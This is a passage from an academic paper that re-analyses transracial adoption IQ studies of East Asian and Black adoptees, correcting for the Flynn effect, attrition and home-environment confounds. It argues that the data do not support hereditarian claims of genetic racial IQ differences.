The second methodological issue is the Flynn effect. James R. Flynn and his colleagues have documented steady rises in average IQ in several countries \[[@B4-jintelligence-05-00001],[@B5-jintelligence-05-00001],[@B6-jintelligence-05-00001],[@B7-jintelligence-05-00001],[@B8-jintelligence-05-00001]\]. These rises makes IQ test norms progressively more outdated over time, so adoptees who take an IQ test would have exaggerated IQ scores relative to people who took the same test earlier. In particular, all IQ tests must be standardized against a reference population, offen the general population of a given country, and when a group of adoptees takes the IQ test at a later date, the time lag exaggerates the adoptees' performance relative to the reference population. Had the reference population taken the test at the same time as the adoptees, the reference population would have set a higher benchmark for the adoptees. The same mechanism means it is usually illegitimate to directly compare adoptees' IQs across studies, because adoptees in different studies are usually tested in different years, and with different tests. Like environment, the year in which a test is taken and the choice of test can be confounded with race. To avoid such confounds, analysts can either subtract out the Flynn effect from each set of results, or make comparisons only of groups which took the same IQ test at approximately the same time.
The third issue, attrition, is less common, affecting only longitudinal studies. Even if a longitudinal study compares adoptees against only other adoptees (eliminating the first confound) who took the same IQ test at similar times (eliminating the second confound), attrition can take place between waves. When researchers lose track of some subjects between waves of a longitudinal study, the pattern of subjects lost to follow-up can vary between subgroups of subjects, degrading the statistical comparability of those subgroups. Taking the specific case of adoptees' IQs, if a longitudinal study included e.g., White and e.g., Black adoptees, and the White adoptees lost to follow-up were disproportionately lower scorers, whereas the Black adoptees lost to follow-up were not, the White--Black IQ difference among the remaining adoptees would be inflated. Race can correlate with selection for retention in the study. One can adjust for this type of selection bias by making a counterfactual estimate of how the subgroups would have scored had no one been lost to follow-up.
The fourth issue is that published reviews of transracial-adoption IQ studies have not considered all of the studies which were available and germane, and this selective treatment of the data may introduce bias. Consequently, as Rushton and Jensen put it, "\[t\]o be compelling, \[\...\] researchers must take the totality of available evidence into account" \[[@B9-jintelligence-05-00001]\] (p. 921). The remainder of this paper should give an idea of whether past writers on transracial adoption and IQ have met this standard.
3. A Hereditarian Interpretation {#sec3-jintelligence-05-00001}
Before contesting the hereditarian model of transracial adoption studies, this paper must first describe it. To that end, this section takes stock of the studies already discussed in the literature, and why they might seem to support the hereditarian hypothesis. [Table 1](#jintelligence-05-00001-t001){ref-type="table"} gives a list in publication-year order, where samples of adoptees with two Black genetic parents each are labelled "Black--Black" and samples of adoptees with one White and one Black genetic parent each are labelled "Black--White". The 130 East Asian adoptees in the Winick, Meyer, and Harris \[[@B10-jintelligence-05-00001]\] and Frydman and Lynn \[[@B11-jintelligence-05-00001]\] studies were all Korean, while the 25 East Asian adoptees in the Clark and Hanisee \[[@B12-jintelligence-05-00001]\] sample comprised "12 from Vietnam, 8 from Korea, 3 from Cambodia, and 2 from Thailand" (p. 596). The racial designations may not be rigorous but the current paper uses them for argument's sake.
A hereditarian interpretation of the data in [Table 1](#jintelligence-05-00001-t001){ref-type="table"} begins by "plac\[ing\] greatest weight on the Minnesota Trans-Racial Adoption Study because it is the largest and best-known of these studies and is the only one that included a longitudinal follow-up" \[[@B1-jintelligence-05-00001]\] (p. 25). Scarr and Weinberg \[[@B13-jintelligence-05-00001]\] reported results from the first wave of that study, and Weinberg, Scarr, and Waldman \[[@B14-jintelligence-05-00001]\] the follow-up results. In both waves the wholly White adoptees had a higher mean IQ than the Black--White adoptees, and the Black--White adoptees had a higher mean IQ than the Black--Black adoptees, in line with the hereditarian model. Moreover, those IQ gaps widened between the study's two waves, consistent with genes exerting greater power as the adoptees aged.
The other studies of Black adoptees \[[@B15-jintelligence-05-00001],[@B16-jintelligence-05-00001]\] do not fit the hereditarian model nearly as well, as the race-IQ correlations they found were all either small or associated higher IQ with greater Black ancestry. However, one can downplay these other studies on the ground that they lacked longitudinal follow-up testing, and by arguing that genetic effects could've been masked by their subjects' lower age (since "as people age, their genes exert ever more influence" \[[@B3-jintelligence-05-00001]\] (p. 259)).
This aligns with the hereditarian claim that mean IQ decreases as Black ancestry increases. As for the claim that mean IQ rises with greater East Asian ancestry, there is the fact that three studies of East Asians adopted in Western countries each reported higher mean IQs for them than the norm of 100 \[[@B3-jintelligence-05-00001]\] (pp. 259--260), as can be seen in [Table 1](#jintelligence-05-00001-t001){ref-type="table"}. The lower mean IQ for adoptees with more Black ancestry and the higher mean IQ for East Asian adoptees may be read as support for the hereditarian model.
4. A Re-Analysis of East Asian Adoptee IQ Data {#sec4-jintelligence-05-00001}
However, the high IQ of these studies' East Asian adoptees is misleading because none of the studies included adoptees of other races, so they had no direct control groups. This posed the two confounding problems introduced in [Section 2](#sec2-jintelligence-05-00001){ref-type="sec"} above: the Flynn effect and the IQ boost from the adoptive environment.
Adjusting for the Flynn effect is conceptually trivial: look up which test an adoptee sample took; work out how much time elapsed between when the test was standardized and when the adoptees took the test; look up the rate of IQ gains for the general population where the adoptees were raised; finally, multiply that rate by the time elapsed between standardization and the adoptees taking the test for an estimate of how much the Flynn effect inflated the adoptees' average IQ. Subtracting that estimate from the adoptees' measured IQ then gives a truer estimate of their IQ.
Adjusting for the adoptive IQ boost is harder. Theoretically one could estimate the average IQ boost due to adoption and subtract it from an adoptee sample's average IQ, but which estimate to use for the average IQ boost from adoption is unclear. The meta-analysis of van IJzendoorn et al. \[[@B17-jintelligence-05-00001]\] has estimates but there are two reasons not to use them. For one thing, the van IJzendoorn et al. meta-analysis incorporated the East Asian adoptee studies I discuss here, so correcting the East Asian IQ means with the van IJzendoorn et al. estimates would be circular reasoning. Worse, van IJzendoorn et al.'s summary of various studies had inaccuracies. For example, their [Table 1](#jintelligence-05-00001-t001){ref-type="table"} (p. 306) described the mean IQ of Korean adoptees in the Winick et al. study \[[@B10-jintelligence-05-00001]\] as matching a norm of 100 (specifically, the Cohen's *d* effect size associated with IQ was "0.00"), although one can calculate from Winick et al. \[[@B10-jintelligence-05-00001]\] that the tested adoptees' mean IQ was 106.7.
As a result, I have no general estimate of adoption's positive effect on IQ, which prevents me from adjusting for the adoptive IQ boost confound. Instead, I adjust for the Flynn effect alone, and then simply ask whether any remaining East Asian IQ advantage is small enough that it could plausibly be attributed to the adoptive IQ boost.
Winick et al. \[[@B10-jintelligence-05-00001]\] is the oldest of the three East Asian adoptee IQ studies. It surveyed 36 "malnourished", 38 "moderately nourished", and 37 "well-nourished" Korean girls adopted as infants by Americans. Upon taking IQ tests between 1971 and 1973, the three groups obtained mean IQs of 102, 106, and 112 respectively. Rushton and Jensen \[[@B3-jintelligence-05-00001]\] (p. 260) observed that they "exceeded the national average" in IQ.
The adoptees' IQs were measured in school \[[@B10-jintelligence-05-00001]\] (p. 1173) with four different group tests: the Lorge-Thorndike Intelligence Test, the Otis-Lennon Mental Ability Test, the Cognitive Abilities Test, and the California Test of Mental Maturity (p. 1175). Unfortunately, Winick et al. did not specify which editions of each test were used, so it is impossible to correct exactly for the Flynn effect. The mental-test guide *Intelligence: Tests and Reviews* \[[@B18-jintelligence-05-00001]\], up to date through January 1974 (p. xxvi), reported that various editions of these tests were published between 1936 and 1972 (pp. 7, 10, 32, 41). The degree to which the Flynn effect inflated the adoptees' apparent IQs depends on which children took which edition of each test and when.
In the US the population's IQ has risen by 0.3 IQ points per year \[[@B4-jintelligence-05-00001],[@B5-jintelligence-05-00001],[@B6-jintelligence-05-00001],[@B7-jintelligence-05-00001]\]. Hence the Flynn effect might have exaggerated the adoptees' mean IQs by as many as 11 points: multiplying 0.3 points per year by the 37 years between 1973 and 1936---when the oldest versions of the tests were published---gives an 11.1-point IQ inflation. (Were the 1936 tests standardized some time before being published the effect could be even greater.) Deducting 11 points from each group mean gives an overall mean IQ of 96, illustrating that the Flynn effect could account for all of the apparent IQ advantage in Winick et al. \[[@B10-jintelligence-05-00001]\]. At the other extreme, the adoptees' schools might have tested almost all of the adoptees in 1972 with the 1972 edition of the Cognitive Abilities Test, in which case the Flynn effect would have inflated the adoptees' IQ scores only negligibly.
Given the study's age, the records of how each child was tested are likely lost, which bars an exact estimate of the Flynn effect affecting this study. Splitting the difference between the two extreme scenarios suggests a Flynn effect of 5--6 points. The studies' results are therefore consistent with a baseline IQ of 100 for Korean adoptees, exaggerated by a Flynn effect of 6 points and an adoptive IQ boost of 6 points, with the undernourished groups losing 6--10 points through malnourishment. Rushton and Jensen's contention \[[@B3-jintelligence-05-00001]\] (p. 260) that the adoptees' IQ "exceeded the national average" is quite possibly fallacious.
A reviewer has suggested that the "malnourishment might be a genetic effect", because low-IQ parents "are poor and have less money for food for their children". Whether this has any effect on my argument depends on the precise comparison one has in mind. If the relevant comparison is between East Asians and Whites with identical environments, including identical levels of nutrition, then whether real-world malnutrition is linked to genes is irrelevant; one wishes to equalize the levels of nutrition between the comparison groups regardless, and may write off the lower IQ of the less nourished groups as the result of an unfair comparison. Alternatively, if one thinks the relevant comparison is between East Asians and Whites born in environments that may differ as long as the differences can be attributed to genes, then correcting for malnutrition is an overcorrection insofar as the malnutrition is genetically driven.
Supposing the latter, *could* genes suffice to explain the lower IQs of the less nourished groups? The causal chain the reviewer highlights runs from parental genes to parental IQ to family income/wealth to child's malnutrition to child's IQ. To set an upper bound on the overall strength of this chain, I may take the product of the upper limits of the correlations between each consecutive pair of variables, assuming arguendo that the links between each pair are causal and linear.
The first correlation is the square root of IQ's heritability among the parental population; a high heritability figure of 80% gives a correlation of 0.89. For the correlation between IQ and income I use 0.23, the highest value from the meta-analysis of Strenze \[[@B19-jintelligence-05-00001]\] (p. 412); note that this is Strenze's correlation between individual IQ and individual income, which is presumably higher than that between individual IQ and *family* income. Lacking a convenient meta-analysis or large-scale study quantifying the correlation between family affluence and malnutrition, I will be generous to the reviewer's argument and suppose the correlation is implausibly high, say 0.8. The final correlation is that between child malnutrition and child IQ, which one may estimate from the Winick et al. \[[@B10-jintelligence-05-00001]\] results themselves, using height and weight percentiles as a quantitative nutritional index. The children in that study designated "malnourished" or "well-nourished" were "below the 3rd percentile for both height and weight" and "at or above the 25th percentile for both height and weight" respectively (p. 1173), and so (making the approximation that height and weight were normally distributed in the reference population) the two groups were separated by at least 1.88 − 0.67 = 1.21 standard deviations in nutritional level. However, the two groups' mean IQs differed by only 10 points, or two thirds of a standard deviation, implying a nutrition-IQ correlation of at most (2 ÷ 3) ÷ 1.21 = 0.55. The overall chained correlation is then 0.89 × 0.23 × 0.8 × 0.55 = 0.09. To explain the two-thirds-of-a-standard-deviation discrepancy between the least and most nourished subsamples in the Winick et al. study, therefore, one would have to posit that the difference in parental IQ between the two subsamples was (2 ÷ 3) ÷ 0.09 = 7.4 standard deviations. This is implausible. The assumptions feeding into that estimate are themselves collectively implausible, but they are conservative, so substituting more plausible assumptions would not change the qualitative result: the chained effect of genes on IQ, of IQ on income, of income on nutrition, and of nutrition on IQ is too feeble to explain away the IQ differences between Winick et al.'s groups on the reviewer's genetic grounds.
This frees me to move on to the most recent of the three East Asian adoptee IQ studies, namely Frydman and Lynn \[[@B11-jintelligence-05-00001]\], a short report on "19 Korean children who were orphaned or abandoned in Korea in the mid-1970s and subsequently adopted by Belgian families" (p. 1323). In 1983 the children attained a mean IQ of 118.7 on the Wechsler Intelligence Scale for Children (WISC), with a verbal mean (VIQ) of 110.6 and a performance mean (PIQ) of 123.5. Frydman and Lynn recognized that they oughtn't take these scores at face value, observing that "the French WISC was standardised in 1954, \[...\] and that the mean IQ in Belgium will have increased over the 29-year period between the standardisation and the testing of the Korean children" (p. 1324). Unfortunately, when adjusting for this, they then assumed that IQ had risen in Belgium at the same rate as in the US: "3 IQ points per decade" (p. 1324).
This was almost surely an under-adjustment. Flynn \[[@B5-jintelligence-05-00001]\] (p. 185) had already published Belgian military results from samples of 18-year-old men, clocking nonverbal test gains at 7--8 points per decade and verbal test gains at 4 points per decade. Mapping the verbal gains to VIQ and the performance gains to PIQ and deducting both from the adoptees' means reduces the adoptees' mean VIQ to 99 and their mean PIQ to 100--103. Adjusting properly for the Flynn effect, then, the Frydman and Lynn adoptees scored on par with Belgian children. When one recalls that adoption should have raised the adoptees' IQs above the general population's average, this outcome is surprising; it suggests that Frydman and Lynn's subjects would have scored *below* comparable White adoptees in Belgian homes.
Frydman and Lynn acknowledged that the Korean adoptees "were brought up in middle class families" and that this "would have raised their mean IQ above that of all \[sic?\] Belgian children" in itself (p. 1324). Estimating that "middle class children obtain a mean IQ of about 105", Frydman and Lynn interpreted their under-adjusted mean of 108.7 as one that "would suggest a genotypic Korean advantage" (p. 1324), but this latter conclusion was an error. After a more sensible adjustment, the Korean adoptees' true mean VIQ and PIQ were between 99 and 103, both less than 105. By Frydman and Lynn's logic this would suggest a genotypic Korean IQ *disadvantage*.
A possible rebuttal to my argument is that I am over-adjusting by using Flynn's data on Belgian IQ gains. Flynn's data cover only the period of 1958 to 1967, whereas Frydman and Lynn's adoptees could have been born no earlier than 1969. Possibly Belgian IQ gains were slower while Frydman and Lynn's subjects were growing up, leading me to adjust the adoptees' averages too much.
Without additional Belgian data it is impossible to decisively refute this rebuttal, but records of French IQ gains, a proxy for Belgian gains, weigh against it. Military samples of French men aged 18 to 22 revealed gains of a point a year on Raven's Progressive Matrices and 0.4 points per year for verbal and mathematical tests between 1949 and 1974, gains at least as fast as those in the Belgium data \[[@B5-jintelligence-05-00001]\] (p. 185). Flieller et al. \[[@B20-jintelligence-05-00001]\] documents a gain of 1.6 standard deviations on Gille's Mosaic test for French 8-year-olds between 1944 and 1984, the equivalent of 0.6 IQ points per year. Deducting 29 × 0.6 = 17.4 points from the adoptees' full-scale IQ mean of 118.7 brings it down to 101.3, neither practically nor statistically different from 100, and again less than 105. Flynn \[[@B5-jintelligence-05-00001]\] (pp. 184--185) also records French gains on the WISC between 1955 and 1979 among 6--15-year-olds, with PIQ rising by 0.6 points a year and VIQ by 0.1 points a year. The minuscule VIQ increase is, however, "unique" and Flynn categorizes the French WISC data as "speculative".
The overall pattern of French results fits my estimates of Belgian IQ gains. All in all, it is very likely that the Korean adoptees in Frydman and Lynn \[[@B11-jintelligence-05-00001]\] would have scored little better than comparable White adoptees. This cuts against Rushton and Jensen's assertion \[[@B3-jintelligence-05-00001]\] (p. 260) that "the Korean children still had a statistically significant 10-point advantage in mean IQ over indigenous Belgian children". The allegation that "\[n\]either the social class of the adopting parents nor the number of years the child spent in the adopted family had any effect on the child's IQ" (p. 260) was also an overreach. For one thing, Frydman and Lynn merely presented bivariate correlations between IQ and whether the parents had a university degree, and between IQ and the number of years the adoptee spent with the adoptive family, and it is impossible to make a conclusive causal statement such as Rushton and Jensen's from those correlations alone. For another, whether or not parents have a university degree is a blunt measure of social class. For a third, the study's sample size was only 19, so the study would have had mediocre power to detect a correlation.
This leaves the study of Clark and Hanisee \[[@B12-jintelligence-05-00001]\], in which 25 adoptees raised in the US had an average IQ-equivalent of 120 on the Peabody Picture Vocabulary Test (PPVT). *Intelligence: Tests and Reviews* \[[@B18-jintelligence-05-00001]\] (p. 930 or §7:417) shows that the PPVT dates from 1959, so the test norms were presumably 20--25 years old when the 25 adoptees were tested. I deduct 6--8 points accordingly for a Flynn-adjusted mean of 112--114. As this is far above the norm of 100, the Flynn effect does not wholly explain these adoptees' elevated IQ. Possibly the adoptees' PPVT scores were inflated further by the PPVT's unrepresentative standardization "on 4012 white children and youth in Nashville, Tennessee" \[[@B18-jintelligence-05-00001]\] (p. 752 or §6:530), but it is not obvious why that would explain all of the adoptees' extra 12--14 IQ points.
One reviewer has intimated that I overcorrected for the Flynn effect in Clark and Hanisee's sample because the PPVT measured the "narrow ability" of verbal ability, while my 3-point-per-decade correction comes from broad IQ batteries. My counter-counterargument: verbal ability is broad, not narrow \[[@B21-jintelligence-05-00001]\], and even vocabulary tests can show a hefty Flynn effect. I am unaware of Flynn-effect data for the PPVT, but in the US National Longitudinal Survey of Youth, standardized scores on the PPVT-R increased by 0.41 standard deviations in 14 years, equivalent to 4.4 points per decade \[[@B22-jintelligence-05-00001]\].
Clark and Hanisee hazarded that the elevated IQ might "be the result of adoptive home environment. \[...\] Only 1 child was adopted into a family with an annual income of less than \$15,000, whereas 11 were placed in families earning more than \$25,000 per year (1978 figures). Both parents typically had college degrees" (p. 597). This would be consistent with a French study which found that abandoned children adopted into upper-middle-class families had IQs 11--16 points higher than half-siblings and full siblings who remained with their biological mother \[[@B23-jintelligence-05-00001]\]. Of course, the applicability of those results to East Asian children adopted in the US is not guaranteed, and other explanations of the Clark and Hanisee results exist.
For instance, one could take the observed mean IQ of 120 and deduct only a few points each for the Flynn effect and the boost from adoption, attributing the remaining excess to a genetic advantage. One could even argue that were it not for the harsh environments the adoptees suffered early in life, their IQs would be even higher, suggesting an even greater genetic advantage. Most of the sample's Vietnamese adoptees "were evacuated from Vietnam during the last stages of United States military involvement in 1975" (p. 597), and all of the sample had lived in an orphanage, foster home, or hospital. Taking this route, Rushton and Jensen \[[@B3-jintelligence-05-00001]\] wrote that "half of the babies had required hospitalization for malnutrition" (p. 260), implying that the adoptees scored well in spite of needing hospital care. In this vein, I note that Clark and Hanisee \[[@B12-jintelligence-05-00001]\] actually report a correlation of +0.3 between hospitalization and PPVT score, and indeed a correlation of +0.7 between hospitalization and scores on another test, the Vineland Social Maturity Scale (p. 598).
This completes my reexamination of these three East Asian adoptee studies. After allowing for the Flynn effect, the Clark and Hanisee sample (*N* = 25) had a mean vocabulary-as-IQ of 112--114, the Frydman and Lynn sample (*N* = 19) a mean VIQ of 99 and a mean PIQ of 100--103, and the Winick et al. sample (*N* = 111) a mean IQ of 96--107. These averages do not allow for the adoptive IQ boost, about which one may only speculate. In my judgement, allowing for the adoptive IQ boost would almost certainly bring the Frydman and Lynn averages below 100, would more likely than not bring the Winick et al. average below 100, and would shift the Clark and Hanisee average to approximately 105. Bearing the studies' sample sizes in mind, these averages imply a slight IQ *dis*advantage for East Asian transracial adoptees, although the evidence leans only modestly in this direction. Conservatively, I infer that East Asian transracial adoptees would score about as well as White adoptees raised in the same homes.
5. A Re-Analysis of Black Adoptee IQ Data {#sec5-jintelligence-05-00001}
Unlike the studies of East Asian adoptees, all of the Black adoptee studies include multiple groups with differing racial admixture, tested at about the same time on similar tests. At least in theory, this allows direct comparison of the groups within each study; since the groups all benefit from adoption's effect on IQ, and their IQs are inflated to similar degrees by the Flynn effect, there is less risk of these effects biasing the results in favour of one racial group over another. However, the biggest of the Black adoptee studies has other complications to untangle.
That biggest study is the Minnesota Transracial Adoption Study (MTRAS). According to Rushton and Jensen, it is "also the only transracial adoption study \[of IQ\] that includes a longitudinal follow-up" \[[@B3-jintelligence-05-00001]\] (p. 256). For the study Sandra Scarr and colleagues located White Minnesotans who had adopted non-White children, and recorded the IQs of the adopters and their children (including the non-adopted White children). Scarr et al. measured the children's IQs in two waves, one when the children had a mean age of 7 and another when they had a mean age of 17. At both times the White adoptees scored higher than the Black--Black adoptees, and the Black--White adoptees scored between the White and the Black--Black adoptees \[[@B13-jintelligence-05-00001],[@B14-jintelligence-05-00001]\].
Not only that, but the measured interracial IQ differences grew between the two waves. Scarr and Weinberg \[[@B13-jintelligence-05-00001]\] reported differences in the first wave of 2.5 points between the White and Black--White (BW) adoptees, and 14.7 points between the White and fully Black adoptees; Weinberg et al. \[[@B14-jintelligence-05-00001]\] reported final differences of 7.1 points and 16.2 points respectively. Rushton and Jensen \[[@B3-jintelligence-05-00001]\] (p. 259) implied that this widening was a genetic effect: "although the shared-family environmental component of true-score IQ variance can be quite large at age 7, by late adolescence it is the smallest component. After that age, genetic and within-family (nonshared) environmental effects account for the largest components". To convince the reader, they pointed to their Figure 3, a plot estimating the proportions of IQ variation "attributable to genetic and environmental (shared and nonshared) effects" with respect to age (p. 252). However, as Richard Nisbett realized, that diagram indicates that "a greater genetic contribution to IQ occurs only after the age of 20" \[[@B24-jintelligence-05-00001]\] (p. 308), because it shows virtually constant heritability from age 6 to age 20. Rushton and Jensen contradicted their own cited graph.
But perhaps the widening interracial differences in the MTRAS were genetically driven despite Rushton and Jensen's error? Probably not, because attrition can explain the apparent widening. A total of 25 White adoptees were in the study when it began, nine of whom were lost at follow-up. The lost adoptees had relatively low IQs, so the remaining White adoptees were unrepresentatively high in IQ, as Mackintosh observed \[[@B25-jintelligence-05-00001]\]. One can prove this by comparing the original IQs of the full sample and the subgroup who were measured at both ages 7 and 17; the latter subgroup had an initial mean IQ of 117.6 (with a minimum IQ of 92) but the full sample had an initial mean of 111.5 (minimum 62). Because initial and final IQs had a correlation of 0.63 among the White group, the elite subgroup would likely have had their final mean IQ inflated by about 0.63 × (117.6 − 111.5) = 3.8 points. Meanwhile, the BW and Black--Black adoptees lost to follow-up hardly differed in IQ from the remaining adoptees, so attrition inflated those groups' mean IQs by about only 0.2 and −0.7 points respectively.
Adjusting the final mean IQs accordingly ([Table 2](#jintelligence-05-00001-t002){ref-type="table"}) implies smaller racial differences of 3.5 points (White vs. BW adoptees) and 11.7 points (White vs. Black--Black adoptees) in the study's final wave. The former is only 1 point wider than the corresponding initial difference, and the latter is 3 points narrower. Hence, allowing for attrition, the IQ differences between the White and the Black adoptees were no larger at age 17 than at age 7, a sign that the apparent enlarging was an artifact and not a genetic effect.
With the widening explained, the only racial IQ differences left to comment on are those present at initial testing. The scant initial gap of 2.5 ± 3.5 points between the fully White and BW adoptees is small enough to be simple statistical noise. Only the IQ of the Black--Black adoptees, who scored 12.2 ± 2.8 points below the BW adoptees, calls for a specific explanation. Differences in home environment are one possibility. On every reported environmental variable, the Black--Black adoptees were worse off than both the BW and fully White adoptees, which I quantify by comparing the former against the BW adoptees, measuring the environmental differences in BW SDs. I use the BW adoptees as a comparison group here because Scarr and Weinberg \[[@B13-jintelligence-05-00001]\] present more data for BW adoptees than White adoptees. The Black--Black adoptees were older when adopted (by 2.1 SDs, or two years); had spent less time in their adoptive home (by 1.1 SDs); had more (by 0.4 SDs) and lower-quality (by 0.8 SDs) adoptive placements; and had adoptive parents with less education and lower mean IQ (by 0.2--0.3 SDs). Additionally, 97% of the BW adoptees had White mothers while the Black--Black adoptees all had Black mothers, with whatever prenatal environmental differences that entailed.
Proponents of the hereditarian model have found the notion of confounding with home environment controversial. For instance, Lee \[[@B26-jintelligence-05-00001]\] (p. 253) found confounding "very doubtful" because "\[t\]here exists no independent evidence that variables such as age at adoption exert effects on IQ lasting until late adolescence", citing the van IJzendoorn et al. meta-analysis \[[@B17-jintelligence-05-00001]\]. However, as mentioned above, that meta-analysis erroneously summarized its studies, and so its analyses (being based on mis-estimated summary statistics) are untrustworthy. Even ignoring this problem, the meta-analysis claimed low power to detect an adoptive-age effect on IQ; the IQ differences associated with higher adoptive age had wide confidence intervals and a lot of heterogeneity (p. 311). Lee added that "the proportion of IQ variance associated with these pre-adoption variables declined over the course of the MTAS from .32 to .13". This is true, but I repeat that the only racial IQ differences in the MTRAS needing a special explanation are those measured at age 7, when the pre-adoptive variables had more explanatory power. Lee also made the reasonable if tentative argument that race and IQ themselves might "affect pre-adoption experience", in which case adjusting for pre-adoptive variables would be "perhaps overly generous towards an environmental hypothesis". He was correct, but this simply means the MTRAS results are ambiguous; making the adjustment may skew the results in favour of a non-hereditarian hypothesis, but not making the adjustment may skew the results in favour of a hereditarian hypothesis. A decisive, objective, and complete interpretation of the results is not possible.
Malloy \[[@B27-jintelligence-05-00001]\] presented results from the MTRAS, writing that "no simple or plausible environmental theories \[...\] explain these kinds of findings", on the grounds that "\[s\]tudies do not support a large role for peer effects on developed intelligence" and that van IJzendoorn et al.'s meta-analysis "found that neither age at adoption or even coming from an abusive or neglectful environment had an effect on the developed IQ scores of adopted children" (p. 1088). As I do not invoke peer effects on IQ I need not comment on those, and I have already commented on the meta-analysis. I will add that the meta-analysis had poor power to detect the effect of abuse on IQ, which may explain why the abuse-associated deficit found (*d* = 0.22) was statistically insignificant.
Lynn \[[@B2-jintelligence-05-00001]\] (p. 24) preempted one of Lee's comments by noting that "what appears to be an age-of-adoption effect may be only a race-differences effect" because correlations between adoptive age and IQ, and between time spent in the adoptive home and IQ, "are confounded with race differences". Again, this is possible, but simply means the study's results are ambiguous. (Below I also adduce evidence that adoptive age correlates negatively with IQ among East Asian transracial adoptees, where Lynn's proposed confounding is excluded.) Lynn makes additional arguments using results for the adoptees at age 17, but the age 7 results are again the pertinent ones.
Rushton and Jensen \[[@B3-jintelligence-05-00001]\] zeroed in on one particular environmental variable: age at adoption. They referred to Jensen's 1998 book *The g factor*, which cited Fisch et al. \[[@B28-jintelligence-05-00001]\], a study supposedly "showing that age of adoption does not influence children's IQ scores after age 7" \[[@B3-jintelligence-05-00001]\] (p. 259). However, Nathan Brody \[[@B29-jintelligence-05-00001]\] (p. 403) noticed that this is a "somewhat tendentious interpretation" of Fisch et al.'s work. Briefly, Fisch et al. compared the IQs of 7-year-olds adopted by their first birthday and 7-year-olds who had been adopted later, discovering a statistically insignificant 4.4-point difference. However, it is unsurprising that this difference was statistically insignificant because "the small sample of \[seventeen\] adoptees older than 1 renders the power of the statistical test of the difference weak" \[[@B29-jintelligence-05-00001]\] (p. 402). Rushton and Jensen's inference that "age of adoption does not influence children's IQ scores after age 7" stands a good chance of having been a type II error.
The next sentence of Rushton and Jensen's review was similarly tendentious: "Studies of severely malnourished, late-adopted, East Asian children (see below) provide substantial evidence that age of adoption does not adversely influence IQ in transracial adoptions" \[[@B3-jintelligence-05-00001]\] (p. 259). The East Asian adoptee studies they referred to are the three I discuss above, yet the adoptees in those studies were *not* "late-adopted" relative to the Black adoptees in the MTRAS, who were adopted at 18 months on average \[[@B13-jintelligence-05-00001]\] (p. 730). The Winick et al. \[[@B10-jintelligence-05-00001]\] (p. 1175) adoptees had a mean age at adoption of 18 months and the Frydman and Lynn \[[@B11-jintelligence-05-00001]\] (p. 1323) adoptees had a mean age at adoption of 19 months. Clark and Hanisee's paper \[[@B12-jintelligence-05-00001]\] does not record an average adoptive age, but its adoptees also don't seem to have been "late-adopted", as the investigators set an upper adoptive age limit of three years (p. 596), and 10 of its 25 adoptees "were relinquished at birth to adoption agencies" (p. 598). Rushton and Jensen also omitted mention of the negative correlations between adoptive age and IQ documented in Frydman and Lynn \[[@B11-jintelligence-05-00001]\] and Clark and Hanisee \[[@B12-jintelligence-05-00001]\]. Winick et al. \[[@B10-jintelligence-05-00001]\], which paid less attention to adoptive age, does not record an age-IQ correlation, but the follow-up study Lien et al. \[[@B30-jintelligence-05-00001]\] found a statistically significant negative relationship between academic achievement and age of arrival in the US for Korean adoptees.
There are no features of the Lien et al. study which explain Rushton and Jensen's omission of it. Lien et al. \[[@B30-jintelligence-05-00001]\] is a study of Korean adoptees raised in the US with extremely similar design to that of Winick et al., the key difference being that the Lien et al. adoptees were at least two years old when adopted while the Winick et al. adoptees were adopted by age 3. Comparing mean IQs across the studies shows that this adoptive age difference was associated with a 5--7 point IQ deficit for Lien et al.'s later adoptees, regardless of nutritional status.
All in all, confounding of adoptee race with environmental variables is a threat to the MTRAS results. Still another factor complicating the interpretation of the MTRAS results is a hard-to-predict Flynn effect, which seems to be caused by the use of different IQ tests for adoptees of different ages \[[@B13-jintelligence-05-00001],[@B14-jintelligence-05-00001]\] and the different age distributions of the White and the Black adoptees \[[@B13-jintelligence-05-00001]\] (p. 730). Loehlin \[[@B31-jintelligence-05-00001]\] (p. 185) presented mean IQs for the study's groups, "adjusted for norm shifts over time", but his tabulation of the data is too meagre to permit detailed analysis. The original data, which I analyze here, may be skewed by this Flynn effect. Correcting for it could conceivably eliminate the attrition effect while restoring the widening of racial IQ gaps over time, but there is little a priori reason to expect that.
I have had to dwell on the MTRAS at length, but there are two more oft-cited Black adoptee studies. One is Tizard \[[@B15-jintelligence-05-00001]\], a one-page report spun off from a language-acquisition study. In that study 64 4½-year-olds took the Wechsler Pre-school and Primary Scale of Intelligence (WPPSI) IQ test, of whom 24 "had been adopted into white families at a mean age of 3.1 yr" (p. 316). A total of 17 adoptees were White and had a mean IQ of 113.0, and seven were BW and had a mean IQ of 119.9. The superior IQ of the adoptees with more Black ancestry reverses the main result of Scarr and Weinberg. In Scarr and Weinberg \[[@B13-jintelligence-05-00001]\], the BW adoptees lagged the White adoptees by 2.5 ± 3.5 points, while in Tizard \[[@B15-jintelligence-05-00001]\], the BW adoptees outscored the White adoptees by 6.9 ± 6.6 points.
The other study is Moore's \[[@B16-jintelligence-05-00001]\], which assessed 23 Black--Black and BW adoptees, raised in White families, on the WISC. Like Tizard \[[@B15-jintelligence-05-00001]\] and unlike Scarr and Weinberg \[[@B13-jintelligence-05-00001]\], the adoptees with more Black ancestry had higher IQs: nine fully Black adoptees had a mean IQ of 118.0 and 14 BW adoptees had a mean IQ of 116.5. The resulting IQ difference is 1.5 ± 4.1 points, where the standard error is approximate because the standard deviations involved are pooled estimates.
Taking an inverse-variance-weighted average of results from Scarr and Weinberg and Tizard, BW adoptees lagged White adoptees by 0.4 ± 3.1 IQ points. Taking an inverse variance-weighted average of results from Scarr and Weinberg and Moore, fully Black adoptees lagged BW adoptees by 7.8 ± 2.3 points, though this estimate assumes a homogeneity of results that doesn't exist. Taken at face value these results suggest that higher Black ancestry is associated with lower IQ among Black adoptees, but not when comparing BW to White adoptees. If one forces these two conflicting results together by taking a weighted average of the two weighted averages, they suggest an IQ drop of about 5 points associated with having an additional Black biological parent, but statistical heterogeneity renders this result suspicious. Another reason for suspicion comes from Moore's work, which also studied 23 Black adoptees raised in *Black* families. Those adoptees had a mean IQ 13.5 ± 3.1 points below the mean of the Black adoptees raised in White families, evidence for the importance of adoptees' home environment rather than adoptees' ancestry.
A hereditarian might invoke heterosis (hybrid vigour) as an explanation for the heterogeneity---perhaps Black ancestry lowers IQ on average, with this effect cancelled out in BW children by an IQ gain from hybrid vigour. However, heterosis has too weak an effect to explain more than a bit of the heterogeneity \[[@B32-jintelligence-05-00001]\].
